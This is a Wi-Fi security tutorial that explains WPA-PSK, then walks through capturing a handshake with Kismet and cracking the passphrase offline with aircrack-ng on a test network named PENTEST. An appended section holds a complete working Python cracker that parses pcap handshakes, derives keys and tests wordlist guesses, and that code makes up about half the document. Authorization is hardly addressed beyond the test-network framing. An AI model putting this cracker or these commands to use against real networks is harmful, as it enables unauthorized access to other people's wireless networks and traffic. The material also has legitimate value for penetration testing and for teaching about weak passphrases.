Security Research

Cracking WPA-PSK Security with Kismet and Aircrack-NG

Written By: Affix <root@root-the.net>
What is WPA-PSK?

WPA is a stronger security technology for Wi-Fi networks than WEP. It provides data protection through encryption together with access control and user authentication. WPA uses 128-bit encryption keys and dynamic session keys to protect the privacy of your wireless network, so traffic protection does not rest on a single static key the way it does with WEP.

There are two basic forms of WPA:

• WPA Enterprise (802.1X; requires a RADIUS server)
• WPA Personal (also known as WPA-PSK)

Either can use TKIP or AES (CCMP) for encryption. Not all WPA hardware supports AES.

WPA-PSK is basically an authentication mechanism in which users provide some form of credential to prove that they should be allowed onto a network. It requires a single passphrase to be entered into each WLAN node (access points, wireless routers, client adapters, bridges). As long as the passphrases match, a client is granted access to the WLAN.

The encryption mechanisms used for WPA Enterprise and WPA-PSK are the same. The only difference is that in WPA-PSK authentication is reduced to one common passphrase instead of user-specific credentials.

The Pre-Shared Key (PSK) mode of WPA is therefore exposed to the same risks as any other shared-password system, dictionary attacks for example. The passphrase and the SSID are turned into the 256-bit PSK with PBKDF2-SHA1 (4096 iterations), and the four-way handshake that follows association carries the nonces and a MIC derived from that key. Anyone who captures one handshake can test passphrase guesses offline, without ever talking to the access point, which is exactly what the rest of this paper does. A second issue is key management: removing a user once access has been granted is hard when the key is shared among many users, although that is unlikely to matter in a home environment.
Hardware

• WiFi card with monitor mode capability
• A minimum-specification system capable of running Linux

Software

• Any Linux distribution (I prefer Fedora)
• Kismet
• Aircrack-NG
• A Unix-formatted wordlist (LF line endings: a list saved with Windows CRLF line endings can leave a trailing carriage return on every candidate, and WPA passphrases are 8 to 63 characters long, so shorter or longer entries cannot be the key)
I have that, now what do I do?

Glad you asked. Simply type kismet into a command-line terminal as shown.
[Affix@localhost wpa-kismet]$ kismet
Well, that wasn't so hard. You may be prompted to start the Kismet server; if so, click [Yes] or press Enter. You will then be prompted for your root password. Once done you should start seeing networks, as shown in the screenshot below. In case you didn't realise, the network we are going to crack here is PENTEST.

As shown in the above screenshot there is a column called Size. We need the size of the captured data to be above 0B. Our target network has 12K, so we are good to go.

Although we have data, we may not have a WPA handshake. Kismet only sees the four-way handshake when a client associates (or re-associates) while we are listening, and the amount of data alone does not prove that one was captured. As this is a test network I have set up, I know there is a WPA handshake in the capture. If you are not sure, wait for a client to connect; aircrack-ng will also tell you how many handshakes it found for each network when you run it.

Take a note of the BSSID of your target network. In our example this is 00:14:7F:64:3E:BF.

Before you continue to read on, please ensure you have a "*.pcapdump" file available. By default Kismet writes its logs, including the pcapdump, into the directory it was started from.
Open a new terminal window and get the name of your pcapdump. I have renamed mine to belegit.pcapdump for ease of use. Then type the following into your terminal, where -a 2 selects the WPA-PSK attack and -w points at your wordlist:

[Affix@localhost ~]$ aircrack-ng -a 2 -w <wordlistpath> belegit.pcapdump

If, like me, you have more than one network in your pcapdump, aircrack-ng lists them and prompts you to enter the number of the one to attack. Pick the entry whose BSSID you noted earlier. The list also shows how many handshakes were found for each network, so a network listed with 0 handshakes cannot be cracked from this capture. To skip the prompt, pass the BSSID directly with -b 00:14:7F:64:3E:BF.

Opening belegit.pcapdump
With any luck this will have cracked your password. Again, as this is a PENTEST network, I know it did. You will see output similar to the following.

Yes, the password was 12345678. Congratulations, you have successfully cracked your first WiFi network!
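The whole procedure above, from the handshake Kismet has to capture to the per-candidate MIC check that aircrack-ng -a 2 performs against the wordlist, condensed into working Python as an added example; it is not code from this paper or from the Kismet or Aircrack-NG projects. The BSSID, SSID and passphrase are the ones used on this page; the station MAC address, the nonces, the sample wordlist and all function names are constructed for the example. It reads a pcap the way a pcapdump would be read (raw 802.11 or radiotap link types), classifies the EAPOL-Key frames into handshake messages 1 to 4 so you can tell whether a usable handshake was captured, Unix-formats the wordlist (strips carriage returns and drops entries outside 8 to 63 characters), and derives PMK, KCK and MIC for each candidate.

```python
# Miniature WPA-PSK cracker (added example, not from the paper or from aircrack-ng/Kismet)
import hashlib
import hmac
import struct

LLC_SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")   # LLC/SNAP header, EtherType 0x888E

def pmk_from_passphrase(passphrase, ssid):   # PSK = PBKDF2-HMAC-SHA1(pass, SSID, 4096 iters, 256 bits)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def kck_from_pmk(pmk, aa, spa, anonce, snonce):
    # PRF-512(PMK, "Pairwise key expansion", min/max MACs || min/max nonces) -> PTK; KCK = PTK[:16]
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                             hashlib.sha1).digest() for i in range(4))[:16]

def eapol_mic(kck, eapol):
    # MIC covers the whole EAPOL frame with the 16-byte MIC field (offset 81) zeroed;
    # key descriptor version 1 = HMAC-MD5 (TKIP), 2 = HMAC-SHA1-128 (CCMP)
    zeroed = eapol[:81] + bytes(16) + eapol[97:]
    md = hashlib.md5 if (struct.unpack(">H", eapol[5:7])[0] & 7) == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, md).digest()[:16]

def eapol_key_frames(cap):
    # Yield (bssid, station, eapol) for every EAPOL-Key data frame in a pcap (DLT 105 or 127)
    linktype, = struct.unpack("<I", cap[20:24])
    off = 24
    while off + 16 <= len(cap):
        incl, = struct.unpack("<I", cap[off + 8:off + 12])
        frame, off = cap[off + 16:off + 16 + incl], off + 16 + incl
        if linktype == 127:                                   # strip the radiotap header
            frame = frame[struct.unpack("<H", frame[2:4])[0]:]
        fc, flags = frame[0], frame[1]
        if (fc & 0x0C) != 0x08 or (flags & 0x03) in (0, 3):  # data frame with one DS bit set
            continue
        hdr = 26 if fc & 0x80 else 24                         # QoS data carries 2 extra bytes
        a1, a2 = frame[4:10], frame[10:16]
        bssid, sta = (a1, a2) if flags & 0x01 else (a2, a1)   # ToDS: addr1 is the BSSID
        body = frame[hdr:]
        if body[:8] != LLC_SNAP_EAPOL or body[9] != 3:        # EAPOL packet type 3 = Key
            continue
        eapol = body[8:]
        yield bssid, sta, eapol[:4 + struct.unpack(">H", eapol[2:4])[0]]  # trims any FCS

def handshake_messages(cap, bssid):
    # Map message number 1..4 -> (station, eapol) from the Key Ack / Key MIC / Secure bits
    msgs = {}
    for b, sta, eapol in eapol_key_frames(cap):
        if b == bssid:
            ki = struct.unpack(">H", eapol[5:7])[0]
            bits = ((ki >> 7) & 1, (ki >> 8) & 1, (ki >> 9) & 1)
            n = {(1, 0, 0): 1, (0, 1, 0): 2, (1, 1, 1): 3, (0, 1, 1): 4}.get(bits)
            if n:
                msgs[n] = (sta, eapol)
    return msgs

def clean_wordlist(text):
    # Unix-format the list: strip CR, keep unique printable ASCII entries of 8..63 characters
    seen = set()
    for line in text.split("\n"):
        pw = line.rstrip("\r")      # a DOS wordlist leaves '\r' on every guess, so all fail
        if 8 <= len(pw) <= 63 and pw.isascii() and pw.isprintable() and pw not in seen:
            seen.add(pw)
            yield pw

def crack(cap, bssid, ssid, wordlist_text):
    msgs = handshake_messages(cap, bssid)
    ap_msg = msgs.get(1) or msgs.get(3)          # either AP message carries the ANonce
    if not ap_msg or 2 not in msgs:              # no usable handshake for this BSSID
        return None
    sta, m2 = msgs[2]                            # message 2 carries SNonce and a MIC to test
    anonce, snonce, mic = ap_msg[1][17:49], m2[17:49], m2[81:97]
    for pw in clean_wordlist(wordlist_text):
        kck = kck_from_pmk(pmk_from_passphrase(pw, ssid), bssid, sta, anonce, snonce)
        if eapol_mic(kck, m2) == mic:
            return pw
    return None

# Constructed sample capture: BSSID and SSID from the page; station MAC, nonces, wordlist made up
BSSID, STA, SSID = bytes.fromhex("00147f643ebf"), bytes.fromhex("001d4f0a1b2c"), "PENTEST"
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
WORDLIST = "password\r\nletmein1\r\n12345678\r\nqwertyuiop\r\n"   # CRLF endings on purpose

def eapol_key(key_info, replay, nonce, mic=bytes(16)):
    # EAPOL-Key frame: RSN descriptor (2), 16-byte key, zero IV/RSC/ID, empty Key Data
    body = struct.pack(">BHHQ", 2, key_info, 16, replay) + nonce + bytes(32) + mic + bytes(2)
    return struct.pack(">BBH", 1, 3, len(body)) + body

def sample_capture(passphrase="12345678", linktype=127):
    m1 = eapol_key(0x008A, 1, ANONCE)                         # Pairwise | Ack, version 2
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, SSID), BSSID, STA, ANONCE, SNONCE)
    m2 = eapol_key(0x010A, 1, SNONCE)                         # Pairwise | MIC, version 2
    m2 = m2[:81] + eapol_mic(kck, m2) + m2[97:]               # the client fills in the MIC
    hdrs = [struct.pack("<BBH", 0x08, 0x02, 0) + STA + BSSID + BSSID + bytes(2),   # FromDS
            struct.pack("<BBH", 0x08, 0x01, 0) + BSSID + STA + BSSID + bytes(2)]   # ToDS
    cap = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, linktype)
    for hdr, eapol in zip(hdrs, (m1, m2)):
        pkt = hdr + LLC_SNAP_EAPOL + eapol
        if linktype == 127:
            pkt = struct.pack("<BBHI", 0, 0, 8, 0) + pkt      # minimal radiotap header
        cap += struct.pack("<IIII", 0, 0, len(pkt), len(pkt)) + pkt
    return cap

if __name__ == "__main__":
    print(sorted(handshake_messages(sample_capture(), BSSID)), crack(sample_capture(), BSSID, SSID, WORDLIST))
```

Run as a script it prints the handshake messages found for the PENTEST BSSID ([1, 2]) and the recovered passphrase, 12345678. To point it at a real pcapdump, read the file with open(path, "rb").read() and pass the BSSID as six bytes. Two things it makes visible that the tutorial only states: the 4096-iteration PBKDF2 is what keeps this attack to thousands of guesses per second per CPU core rather than millions, and only a MIC-carrying client message (message 2 here) gives anything to test against, so the Size column in Kismet says nothing about whether a handshake is present.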
FAQ

Q – I get the error "ERROR: mac80211_setchannel() could not set channel x/xxxx on interface 'x' err -16"

A – Error -16 is EBUSY: the interface is currently in use, usually because it is still associated with a network or is being managed by NetworkManager or wpa_supplicant, so Kismet cannot hop channels on it. Disconnect from any networks the interface is connected to (airmon-ng check kill, which ships with Aircrack-NG, stops the usual offending processes) and try again.